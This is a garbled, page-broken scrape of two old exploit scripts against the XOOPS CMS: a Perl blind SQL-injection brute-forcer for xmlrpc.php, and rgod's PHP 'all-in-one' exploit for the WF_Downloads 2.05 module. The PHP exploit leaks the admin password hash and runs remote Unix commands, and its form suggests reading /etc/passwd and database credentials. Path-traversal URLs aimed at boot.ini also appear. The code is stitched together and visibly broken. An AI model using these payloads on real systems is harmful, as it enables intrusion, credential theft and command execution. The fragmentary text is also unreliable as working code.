# error_reporting0; ini_set"max_execution_time",0; ini_set"default_socket_timeout", 2; ob_implicit_flush 1; echo'XOOPS WF_Downloads module 2.05 SQL Injection body { background-color:#
Trang 1$data = '<?xml version="1.0"?>';
$data = '<methodCall>';
$data = '<methodName>blogger.getUsersBlogs</methodName>';
$data = '<params>';
$data = '<param>';
$data = '<value><string></string></value>';
$data = '</param>';
$data = '<param>';
$data = '<value><string>'.$name.'\' AND
ascii(substring(pass,'.$s_num.',1))'.$ccheck.')/*</string></value>';
$data = '</param>';
$data = '</params>';
$data = '</methodCall>';
$req = new HTTP::Request 'POST' => $url;
$req->content_type('application/xml');
$req->content($data);
$ua = new LWP::UserAgent;
$res = $ua->request($req);
$reply= $res->content;
if($reply =~ /Selected blog application does not exist/) { print "\n [-] NEWS BLOG DOES NOT EXIST =(\n [-] EXPLOIT FAILED!\n"; exit(); }
if($reply =~ /User authentication failed/) { return 0; }
else { return 1; }
}
sub status()
{
$status = $n % 5;
if($status==0){ print "\b\b/]"; }
if($status==1){ print "\b\b-]"; }
if($status==2){ print "\b\b\\]"; }
if($status==3){ print "\b\b|]"; }
}
sub usage()
{
&head;
Trang 2print q(
USAGE:
r57xoops.pl [OPTIONS]
OPTIONS:
-u [url] - path to xmlrpc.php
-n [USERNAME] - user for bruteforce
E.G
r57xoops.pl -u http://server/xoops/xmlrpc.php -n admin
-
(c)oded by 1dt.w0lf
RST/GHC , http://rst.void.ru , http://ghc.ru
);
exit();
}
sub head()
{
print q(
-
Xoops <= 2.0.11 xmlrpc.php sql injection exploit by RST/GHC
-
);
}
Xoops (wfdownloads) 2.05 Module Multiple Vulnerabilities Exploit
Code:
<?php
/*
rgod:
http://[target]/[path_to_xoops]/class/xoopseditor/textarea/editor_registry.php?xoop sConfig[language]= / / / / / / / / / /script
http://[target]/[path_to_xoops]/class/xoopseditor/textarea/editor_registry.php?xoop sConfig[language]= / / / / / / / / / /boot.ini%00
http://[target]/[path_to_xoops]/class/xoopseditor/koivi/editor_registry.php?xoopsC onfig[language]= / / / / / / / / / /script
http://[target]/[path_to_xoops]/class/xoopseditor/koivi/editor_registry.php?xoopsC onfig[language]= / / / / / / / / / /boot.ini%00
Trang 3?xoopsConfig[language]= / / / / / / / / / /script
http://[target]/[path_to_xoops]/class/xoopseditor/dhtmltextarea/editor_registry.php
?xoopsConfig[language]= / / / / / / / / / /boot.ini%00
added for future reference /str0ke
*/
# -XOOPS_WFd205_xpl.php 11.35 12/11/2005 #
# #
# XOOPS WF_Downloads Module v 2.05 SQL injection / #
# Admin credentials disclosure & remote commands execution all-in-one #
# by rgod #
# site: http://rgod.altervista.org #
# #
# usage: launch from Apache, fill in requested fields, then go! #
# #
# make these changes in php.ini if you have troubles #
# with this script: #
# allow_call_time_pass_reference = on #
# register_globals = on #
# #
# Sun-Tzu: "Indirect tactics, efficiently applied, are inexhausible as Heaven # # and Earth, unending as the flow of rivers and streams; like the sun and #
# moon, they end but to begin anew; like the four seasons, they pass away to # # return once more #
error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout", 2); ob_implicit_flush (1); echo'<html><head><title>XOOPS WF_Downloads module 2.05 SQL Injection
</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style
type="text/css"> body { background-color:#111111; SCROLLBAR-ARROW-COLOR:#ffffff;
SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; } img
Trang 4{background-color: #FFFFFF !important} input {background-color: #303030
!important} option { background-color: #303030 !important} textarea {background-color: #303030 !important} input {color: #1CB081 !important} option
{color: #1CB081 !important} textarea {color: #1CB081 !important} checkbox {background-color: #303030 !important} select {font-weight: normal; color:
#1CB081; background-color: #303030;} body {font-size: 8pt !important; background-color: #111111; body * {font-size: 8pt !important} h1 {font-size: 0.8em !important} h2 {font-size: 0.8em !important} h3 {font-size: 0.8em
!important} h4,h5,h6 {font-size: 0.8em !important} h1 font {font-size: 0.8em
!important} h2 font {font-size: 0.8em !important}h3 font {font-size: 0.8em
!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style: normal !important} *{text-decoration: none !important} a:link,a:active,a:visited { text-decoration: none ; color : #99aa33; } a:hover{text-decoration: underline; color : #999933; } Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; } Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-weight:bold; font-style: italic;} ></style></head><body><p class="Stile6"> XOOPS WF_Downloads module 2.05 SQL Injection </p><p class=" Stile6">a script by rgod at <a href="http://rgod.altervista.org"target="_blank"> http://rgod.altervista.org</a></p><table width="84%"><tr><td width="43%">
<form
name="form1" method="post"
action="'.$SERVER[PHP_SELF].'?path=value&host=
value&port=value&command=value&proxy=value&action=value"><p><input type="text"
name="host"> <span class="Stile5"> * hostname (ex: www.sitename.com)
</span></p>
<p><input type="text" name="path"><span class="Stile5"> * path ( ex: /xoops/ or just / )</span></p><p><input type="text" name="username"><span
class="Stile5"> *
username</span></p><p><input type="text" name="password"><span
class="Stile5"> *
and password, to retrieve a session cookie</span> </p> <p><input type="text" name="action"><span class="Stile5"> * action: "HASH" to disclose admin
loginname
& MD5 password hash, "CMD" to launch commands </span> </p><p> <input type="text"
name="pathtoWWW"><span class="Stile5">path to WWW ftom Mysql
directory,need this
Trang 5for " INTO OUTFILE " statement (default: / /www) </span></p><p> <input type="text" name="table_prefix"> <span class="Stile5"> specify a table prefix other than the default (fXZtr_)</span></p><p><input type="text" name="port">
<span class="Stile5">specify a port other than 80 (default value)</span> </p><p>
<input type="text" name="command"> <span class="Stile5">a Unix command, example:
ls -la to list directories, cat /etc/passwd to show passwd file, cat / /mainf
ile.php to see database username and password</span></p><p><input type="text" name="proxy"> <span class="Stile5"> send exploit through an HTTP proxy
(ip:port)
</span></p><p><input type="submit"name="Submit" value="go!"> </p> </form>
</td>
</tr></table></body></html>';
function show($headeri)
{
$ii=0;
$ji=0;
$ki=0;
$ci=0;
echo '<table border="0"><tr>';
while ($ii <= strlen($headeri)-1)
{
$datai=dechex(ord($headeri[$ii]));
if ($ji==16) {
$ji=0;
$ci++;
echo "<td> </td>";
for ($li=0; $li<=15; $li++)
{ echo "<td>".$headeri[$li+$ki]."</td>";
} $ki=$ki+16;
echo "</tr><tr>";
}
if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else
{echo "<td>".$datai."</td> ";}
$ii++;
$ji++;